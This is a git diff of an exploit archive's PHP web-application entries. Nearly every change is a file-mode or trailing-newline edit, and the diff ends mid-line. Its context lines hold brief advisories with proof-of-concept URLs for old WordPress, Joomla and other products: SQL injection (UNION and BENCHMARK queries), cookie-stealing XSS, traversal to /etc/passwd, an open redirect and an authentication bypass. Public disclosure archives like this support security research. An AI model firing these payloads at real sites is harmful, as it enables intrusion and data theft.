mode 100644 index 7e9924a19..ae1fa1bef --- a/platforms/php/webapps/37063.txt +++ b/platforms/php/webapps/37063.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Update Apr 9, 2012: The vendor disputes this issue stating the issue can not be exploited as described, as the reported parameter does not exist. -http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql] \ No newline at end of file +http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql] \ No newline at end of file diff --git a/platforms/php/webapps/37067.txt b/platforms/php/webapps/37067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3707.txt b/platforms/php/webapps/3707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37070.txt b/platforms/php/webapps/37070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37071.txt b/platforms/php/webapps/37071.txt old mode 100755 new mode 100644 index ea31bba4b..8c99f6b7e --- a/platforms/php/webapps/37071.txt +++ b/platforms/php/webapps/37071.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to compromise the application, access or mo CitrusDB 2.4.1 is vulnerable; other versions may also be affected. -http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base \ No newline at end of file +http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base \ No newline at end of file diff --git a/platforms/php/webapps/37072.txt b/platforms/php/webapps/37072.txt old mode 100755 new mode 100644 index 6ace83391..94bfe8e9b --- a/platforms/php/webapps/37072.txt +++ b/platforms/php/webapps/37072.txt @@ -8,4 +8,4 @@ Matterdaddy Market 1.1 is vulnerable; other versions may also be affected. http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory -http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory \ No newline at end of file +http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory \ No newline at end of file diff --git a/platforms/php/webapps/37073.html b/platforms/php/webapps/37073.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37074.txt b/platforms/php/webapps/37074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37075.txt b/platforms/php/webapps/37075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37076.txt b/platforms/php/webapps/37076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37077.txt b/platforms/php/webapps/37077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37078.txt b/platforms/php/webapps/37078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37079.txt b/platforms/php/webapps/37079.txt old mode 100755 new mode 100644 index cd857a39b..b4f9060be --- a/platforms/php/webapps/37079.txt +++ b/platforms/php/webapps/37079.txt @@ -68,4 +68,4 @@ For further details and explanations check the full advisory. [+] Disclaimer -Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. \ No newline at end of file +Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. \ No newline at end of file diff --git a/platforms/php/webapps/37080.txt b/platforms/php/webapps/37080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37082.txt b/platforms/php/webapps/37082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37083.txt b/platforms/php/webapps/37083.txt old mode 100755 new mode 100644 index 0fb1b9d33..5e7b01e36 --- a/platforms/php/webapps/37083.txt +++ b/platforms/php/webapps/37083.txt @@ -10,4 +10,4 @@ http://www.example.com/beatz/index.php?option=com_charts&view=charts&Itemid=76&c http://www.example.com/beatz/index.php?do=listAll&keyword=++Search";><img+src=0+onerror=prompt(/XSS/)>&option=com_find -http://www.example.com/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search \ No newline at end of file +http://www.example.com/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search \ No newline at end of file diff --git a/platforms/php/webapps/37085.txt b/platforms/php/webapps/37085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37086.txt b/platforms/php/webapps/37086.txt old mode 100755 new mode 100644 index 356fb8114..4c516d06b --- a/platforms/php/webapps/37086.txt +++ b/platforms/php/webapps/37086.txt @@ -5,4 +5,4 @@ Yahoo Answer plugin for WordPress is prone to multiple cross-site scripting vuln An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/[]/[]/process-imported-question.php?catname=[xss] -http://www.example.com/[]/[]/editautopilot.php?query=[xss] \ No newline at end of file +http://www.example.com/[]/[]/editautopilot.php?query=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/37087.txt b/platforms/php/webapps/37087.txt old mode 100755 new mode 100644 index baf42ab68..d3f5ec9c5 --- a/platforms/php/webapps/37087.txt +++ b/platforms/php/webapps/37087.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect TeamPass 2.1.5 is vulnerable; other versions may also be affected. POST /TeamPass/sources/users.queries.php HTTP/1.1 -type=add_new_user&login=[XSS]&pw=testing2&email=test&admin=false&manager=true&read_only=false&personal_folder=false&new_folder_role_domain=false&domain=test&key=key \ No newline at end of file +type=add_new_user&login=[XSS]&pw=testing2&email=test&admin=false&manager=true&read_only=false&personal_folder=false&new_folder_role_domain=false&domain=test&key=key \ No newline at end of file diff --git a/platforms/php/webapps/37090.txt b/platforms/php/webapps/37090.txt old mode 100755 new mode 100644 index 69e8fbfc7..d15dc3167 --- a/platforms/php/webapps/37090.txt +++ b/platforms/php/webapps/37090.txt @@ -4,4 +4,4 @@ The JA T3 Framework component for Joomla! is prone to a directory-traversal vuln Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. -http://www.example.com/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 \ No newline at end of file +http://www.example.com/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 \ No newline at end of file diff --git a/platforms/php/webapps/37091.txt b/platforms/php/webapps/37091.txt old mode 100755 new mode 100644 index 89dacbb8c..b638a05cb --- a/platforms/php/webapps/37091.txt +++ b/platforms/php/webapps/37091.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Acuity CMS 2.6.2 is vulnerable; other versions may also be affected. -http://www.example.com/admin/login.asp?UserName=";><script>prompt(/xss/)</script> \ No newline at end of file +http://www.example.com/admin/login.asp?UserName=";><script>prompt(/xss/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/37092.txt b/platforms/php/webapps/37092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37093.txt b/platforms/php/webapps/37093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37094.txt b/platforms/php/webapps/37094.txt old mode 100755 new mode 100644 index cc6383aae..47b8688de --- a/platforms/php/webapps/37094.txt +++ b/platforms/php/webapps/37094.txt @@ -12,4 +12,4 @@ ownCloud 3.0.0 is vulnerable; other versions may also be affected. http://www.example.com/owncloud/index.php?redirect_url=1"><script>alert("Help Me")</script><l=" (must not be logged in) -http://www.example.com/owncloud/index.php?redirect_url=http%3a//www.boeserangreifer.de/ \ No newline at end of file +http://www.example.com/owncloud/index.php?redirect_url=http%3a//www.boeserangreifer.de/ \ No newline at end of file diff --git a/platforms/php/webapps/37095.txt b/platforms/php/webapps/37095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37096.html b/platforms/php/webapps/37096.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3710.php b/platforms/php/webapps/3710.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37100.txt b/platforms/php/webapps/37100.txt old mode 100755 new mode 100644 index c5771e883..a22362e6a --- a/platforms/php/webapps/37100.txt +++ b/platforms/php/webapps/37100.txt @@ -10,4 +10,4 @@ http://www.example.com/WebApps/products_xx.php?id=[XSS] SQL Injection -http://www.example.com/WebApps/products_xx.php?id=[SQL Injection] \ No newline at end of file +http://www.example.com/WebApps/products_xx.php?id=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/37101.txt b/platforms/php/webapps/37101.txt old mode 100755 new mode 100644 index 70d3d3553..07d58960a --- a/platforms/php/webapps/37101.txt +++ b/platforms/php/webapps/37101.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access CCNewsLetter 1.0.7 is vulnerable; prior versions may also be affected. - http://www.example.com/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] \ No newline at end of file + http://www.example.com/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37102.txt b/platforms/php/webapps/37102.txt old mode 100755 new mode 100644 index 39f94bf17..bad6198ed --- a/platforms/php/webapps/37102.txt +++ b/platforms/php/webapps/37102.txt @@ -10,4 +10,4 @@ http://www.example.com/index.php?option=com_videogallery&Itemid=68' http://www.example.com/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]-- -http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00 \ No newline at end of file +http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00 \ No newline at end of file diff --git a/platforms/php/webapps/37103.txt b/platforms/php/webapps/37103.txt old mode 100755 new mode 100644 index 13d79150c..45acebe70 --- a/platforms/php/webapps/37103.txt +++ b/platforms/php/webapps/37103.txt @@ -8,4 +8,4 @@ concrete5 5.5.2.1 is vulnerable; other versions may also be affected. http://www.example.com/concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata -http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form \ No newline at end of file +http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form \ No newline at end of file diff --git a/platforms/php/webapps/37104.txt b/platforms/php/webapps/37104.txt old mode 100755 new mode 100644 index 2ac2dcc7e..7d599b21e --- a/platforms/php/webapps/37104.txt +++ b/platforms/php/webapps/37104.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow gpEasy 2.3.3 is vulnerable; other versions may also be affected. -http://www.example.com/index.php/Admin_Preferences?gpreq=json&jsoncallback=<h1>test<br>test2<%2fh1> \ No newline at end of file +http://www.example.com/index.php/Admin_Preferences?gpreq=json&jsoncallback=<h1>test<br>test2<%2fh1> \ No newline at end of file diff --git a/platforms/php/webapps/37105.txt b/platforms/php/webapps/37105.txt old mode 100755 new mode 100644 index 1288b4edd..36bc60f8d --- a/platforms/php/webapps/37105.txt +++ b/platforms/php/webapps/37105.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Quick.CMS 4.0 is vulnerable; other versions may also be affected. -http://www.example.com/admin/?p=[xss] \ No newline at end of file +http://www.example.com/admin/?p=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/37106.txt b/platforms/php/webapps/37106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37107.txt b/platforms/php/webapps/37107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37108.txt b/platforms/php/webapps/37108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37109.txt b/platforms/php/webapps/37109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3711.htm b/platforms/php/webapps/3711.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37111.txt b/platforms/php/webapps/37111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37112.txt b/platforms/php/webapps/37112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37113.txt b/platforms/php/webapps/37113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37118.txt b/platforms/php/webapps/37118.txt old mode 100755 new mode 100644 index 2a8b9f251..8e865e7c9 --- a/platforms/php/webapps/37118.txt +++ b/platforms/php/webapps/37118.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SKYUC 3.2.1 is vulnerable; other versions may also be affected. -http://www.example.com/search.php?encode=[XSS] \ No newline at end of file +http://www.example.com/search.php?encode=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3712.txt b/platforms/php/webapps/3712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37120.txt b/platforms/php/webapps/37120.txt old mode 100755 new mode 100644 index ea4df5089..9e6cbb94e --- a/platforms/php/webapps/37120.txt +++ b/platforms/php/webapps/37120.txt @@ -4,4 +4,4 @@ Uiga FanClub is prone to an SQL-injection vulnerability because it fails to suff A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[Patch]/index2.php?c=1&p=[SQL] \ No newline at end of file +http://www.example.com/[Patch]/index2.php?c=1&p=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/37122.txt b/platforms/php/webapps/37122.txt old mode 100755 new mode 100644 index 5476509fa..0f2d7f119 --- a/platforms/php/webapps/37122.txt +++ b/platforms/php/webapps/37122.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access PHP Volunteer Management 1.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/mods/messages/data/get_messages.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10 \ No newline at end of file +http://www.example.com/mods/messages/data/get_messages.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10 \ No newline at end of file diff --git a/platforms/php/webapps/37123.txt b/platforms/php/webapps/37123.txt old mode 100755 new mode 100644 index ce9b01677..10b2d79a7 --- a/platforms/php/webapps/37123.txt +++ b/platforms/php/webapps/37123.txt @@ -4,4 +4,4 @@ The WPsc MijnPress for WordPress is prone to a cross-site scripting vulnerabilit An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wp-content/plugins/wp-content/plugins/wpsc-mijnpress/mijnpress_plugin_framework.php?rwflush=[xss] \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-content/plugins/wpsc-mijnpress/mijnpress_plugin_framework.php?rwflush=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/37125.txt b/platforms/php/webapps/37125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37127.txt b/platforms/php/webapps/37127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37128.txt b/platforms/php/webapps/37128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37129.txt b/platforms/php/webapps/37129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3713.txt b/platforms/php/webapps/3713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37130.txt b/platforms/php/webapps/37130.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37131.txt b/platforms/php/webapps/37131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37132.txt b/platforms/php/webapps/37132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37133.txt b/platforms/php/webapps/37133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37134.php b/platforms/php/webapps/37134.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37136.txt b/platforms/php/webapps/37136.txt old mode 100755 new mode 100644 index 322eab130..4289bbca8 --- a/platforms/php/webapps/37136.txt +++ b/platforms/php/webapps/37136.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Trombinoscope 3.5 and prior versions are vulnerable. -http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()-- \ No newline at end of file +http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()-- \ No newline at end of file diff --git a/platforms/php/webapps/37137.txt b/platforms/php/webapps/37137.txt old mode 100755 new mode 100644 index b81932894..94df4a296 --- a/platforms/php/webapps/37137.txt +++ b/platforms/php/webapps/37137.txt @@ -9,4 +9,4 @@ The following products are affected: Schneider Electric Telecontrol Kerweb versions prior to 3.0.1 Schneider Electric Telecontrol Kerwin versions prior to 6.0.1 -http://www.example.com/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename=[XSS] \ No newline at end of file +http://www.example.com/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37138.txt b/platforms/php/webapps/37138.txt old mode 100755 new mode 100644 index f320cfb54..670bb6874 --- a/platforms/php/webapps/37138.txt +++ b/platforms/php/webapps/37138.txt @@ -4,4 +4,4 @@ Ramui Forum Script is prone to a cross-site scripting vulnerability because it f An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22 \ No newline at end of file +http://www.example.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22 \ No newline at end of file diff --git a/platforms/php/webapps/37139.txt b/platforms/php/webapps/37139.txt old mode 100755 new mode 100644 index d30c20a2a..76859fc18 --- a/platforms/php/webapps/37139.txt +++ b/platforms/php/webapps/37139.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to bypass authentication to gain administrative JibberBook 2.3 is vulnerable; other versions may also be affected. -http://www.example.com/Admin/Login_form.php?loggedin=true \ No newline at end of file +http://www.example.com/Admin/Login_form.php?loggedin=true \ No newline at end of file diff --git a/platforms/php/webapps/3714.txt b/platforms/php/webapps/3714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37140.html b/platforms/php/webapps/37140.html old mode 100755 new mode 100644 index 95a87177e..e5f9ee2ff --- a/platforms/php/webapps/37140.html +++ b/platforms/php/webapps/37140.html @@ -12,4 +12,4 @@ PHP Enter 4.1.2 is vulnerable; other versions may also be affected. <textarea name="code">&lt;/textarea&gt; <br /><br /> <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/37142.txt b/platforms/php/webapps/37142.txt old mode 100755 new mode 100644 index 67253265a..1142bdc26 --- a/platforms/php/webapps/37142.txt +++ b/platforms/php/webapps/37142.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. -http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20 OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,EN CODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202 \ No newline at end of file +http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20 OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,EN CODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202 \ No newline at end of file diff --git a/platforms/php/webapps/37143.txt b/platforms/php/webapps/37143.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37144.txt b/platforms/php/webapps/37144.txt old mode 100755 new mode 100644 index e44083b43..e80c4d08a --- a/platforms/php/webapps/37144.txt +++ b/platforms/php/webapps/37144.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. -http://www.example.com/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37145.txt b/platforms/php/webapps/37145.txt old mode 100755 new mode 100644 index c6af0ed6b..cc5c0fca5 --- a/platforms/php/webapps/37145.txt +++ b/platforms/php/webapps/37145.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. -http://www.example.com/index.php?uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37146.txt b/platforms/php/webapps/37146.txt old mode 100755 new mode 100644 index aba6575b0..79f0d5b71 --- a/platforms/php/webapps/37146.txt +++ b/platforms/php/webapps/37146.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PivotX 2.3.2 is vulnerable; other versions may also be affected. -http://www.example.com/pivotx/ajaxhelper.php?function=view&file=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/pivotx/ajaxhelper.php?function=view&file=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37147.txt b/platforms/php/webapps/37147.txt old mode 100755 new mode 100644 index e197b4968..8b1e823f3 --- a/platforms/php/webapps/37147.txt +++ b/platforms/php/webapps/37147.txt @@ -8,4 +8,4 @@ An attacker may leverage the information-disclosure issue to enumerate the exist Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected. -http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script> \ No newline at end of file +http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/37148.txt b/platforms/php/webapps/37148.txt old mode 100755 new mode 100644 index 7fd25d7ab..8e347b297 --- a/platforms/php/webapps/37148.txt +++ b/platforms/php/webapps/37148.txt @@ -8,4 +8,4 @@ An attacker may leverage the information-disclosure issue to enumerate the exist Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected. -http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php \ No newline at end of file +http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php \ No newline at end of file diff --git a/platforms/php/webapps/37151.txt b/platforms/php/webapps/37151.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37155.txt b/platforms/php/webapps/37155.txt old mode 100755 new mode 100644 index 5f6930ccb..ede956f05 --- a/platforms/php/webapps/37155.txt +++ b/platforms/php/webapps/37155.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WP-FaceThumb 0.1 is vulnerable; other versions may also be affected. -http://www.example.com/?page_id=1&pagination_wp_facethumb=1"><img/src=x onerror=alert(document.cookie)> \ No newline at end of file +http://www.example.com/?page_id=1&pagination_wp_facethumb=1"><img/src=x onerror=alert(document.cookie)> \ No newline at end of file diff --git a/platforms/php/webapps/37161.txt b/platforms/php/webapps/37161.txt old mode 100755 new mode 100644 index fa7a6e3af..69919e488 --- a/platforms/php/webapps/37161.txt +++ b/platforms/php/webapps/37161.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow GRAND Flash Album Gallery 1.71 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/admin.php?page=flag-skins&skin=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=flag-skins&skin=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37162.txt b/platforms/php/webapps/37162.txt old mode 100755 new mode 100644 index 706a0cc1b..71892030f --- a/platforms/php/webapps/37162.txt +++ b/platforms/php/webapps/37162.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Dynamic Widgets 1.5.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/themes.php?page=dynwid-config&action=edit&id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file +http://www.example.com/wp-admin/themes.php?page=dynwid-config&action=edit&id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37166.php b/platforms/php/webapps/37166.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3717.txt b/platforms/php/webapps/3717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37174.txt b/platforms/php/webapps/37174.txt old mode 100755 new mode 100644 index 45bf0c927..063f6941d --- a/platforms/php/webapps/37174.txt +++ b/platforms/php/webapps/37174.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Network Publisher 5.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/plugins.php?page=networkpub \ No newline at end of file +http://www.example.com/wp-admin/plugins.php?page=networkpub \ No newline at end of file diff --git a/platforms/php/webapps/37176.txt b/platforms/php/webapps/37176.txt old mode 100755 new mode 100644 index 45d44e1a3..fd21e924d --- a/platforms/php/webapps/37176.txt +++ b/platforms/php/webapps/37176.txt @@ -8,4 +8,4 @@ PDF & Print Button Joliprint 1.3.0 is vulnerable; other versions may also be aff http://www.example.com/wp-admin/options-general.php?page=joliprint/joliprint_admin_options.php&amp;opt=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E -http://www.example.com/wp-content/plugins/joliprint/joliprint_options_upload.php?type=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/joliprint/joliprint_options_upload.php?type=%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37177.txt b/platforms/php/webapps/37177.txt old mode 100755 new mode 100644 index 58e0e003c..6795803e9 --- a/platforms/php/webapps/37177.txt +++ b/platforms/php/webapps/37177.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CataBlog 1.6 is vulnerable; other versions may also be affected. -http://www.example.com/wp-admin/admin.php?page=catablog-gallery&category="><script>alert(1)</script> \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=catablog-gallery&category="><script>alert(1)</script> \ No newline at end of file diff --git a/platforms/php/webapps/37178.txt b/platforms/php/webapps/37178.txt old mode 100755 new mode 100644 index d2441f5bf..36e6f6dc2 --- a/platforms/php/webapps/37178.txt +++ b/platforms/php/webapps/37178.txt @@ -8,4 +8,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/pinterest.php?pinterest-url=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&pinterest-description=1 -http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37179.txt b/platforms/php/webapps/37179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3718.txt b/platforms/php/webapps/3718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37180.txt b/platforms/php/webapps/37180.txt old mode 100755 new mode 100644 index 7f42296fe..bdd2278d2 --- a/platforms/php/webapps/37180.txt +++ b/platforms/php/webapps/37180.txt @@ -4,4 +4,4 @@ Newsletter Manager plugin for WordPress is prone to multiple cross-site scriptin An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/wp-admin/admin.php?page=newsletter-manager-emailcampaigns&action=test_mail&id=1&pageno=1&id="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/wp-admin/admin.php?page=newsletter-manager-emailcampaigns&action=test_mail&id=1&pageno=1&id="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/37182.txt b/platforms/php/webapps/37182.txt old mode 100755 new mode 100644 diff --git 